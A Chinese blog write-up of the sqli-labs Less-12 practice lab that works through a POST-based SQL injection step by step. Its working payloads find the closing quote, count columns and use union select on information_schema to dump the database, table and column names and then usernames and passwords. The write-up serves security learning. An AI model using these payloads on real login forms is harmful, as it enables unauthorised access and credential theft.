当前位置：首页 > article >正文

sqli-labs less-12 post注入

article 2024/10/9 13:09:06

sqli-labs less-12

在这里插入图片描述
首先尝试在url进行测试，发现页面无任何变化。在提交窗口随意输入，打开hackbar插件，查看数据 (注意，hackbar插件使用时，&Submit=Submit中S必须大写)

猜测为post注入。在post提交参数中uname后加入单引号，页面显示登录失败，无报错，添加双引号，报错
post注入参数

uname=aaa"&passwd=aaa&Submit=Submit

在这里插入图片描述

从报错分析闭合方式为")，构造

uname=aaa") or 1=1 #&passwd=aaa&Submit=Submit

显示
在这里插入图片描述
存在注入

查看列数

uname=aaa") order by 4 #&passwd=aaa&Submit=Submit 报错
uname=aaa") order by 3 #&passwd=aaa&Submit=Submit 报错
uname=aaa") order by 2 #&passwd=aaa&Submit=Submit 无回显，确定列数2

union联合注入查询确定回显位，数据库名，版本等

uname=aaa") union select 1,2 #&passwd=aaa&Submit=Submit
uname=aaa") union select database(),version() #&passwd=aaa&Submit=Submit

在这里插入图片描述

爆出所有数据库名，表名，列名，数据

uname=aaa") union select group_concat(schema_name),version() from information_schema.schemata #&passwd=aaa&Submit=Submit
所有数据库

uname=aaa") union select group_concat(table_name),version() from information_schema.tables where table_schema=database() #&passwd=aaa&Submit=Submit
security的所有表明

uname=aaa") union select group_concat(column_name),version() from information_schema.columns where table_schema=database() and table_name=‘users’ #&passwd=aaa&Submit=Submit
所有列明

*uname=aaa") union select group_concat(username,‘:’,password),version() from security.users #&passwd=aaa&Submit=Submit
数据

至此，结束，
题外话：想问一下大家，为什么这次不能使用–+注入，只能–或者#。且–与&之间需要空格，不能直连，是因为url编码嘛，求大佬指点。谢谢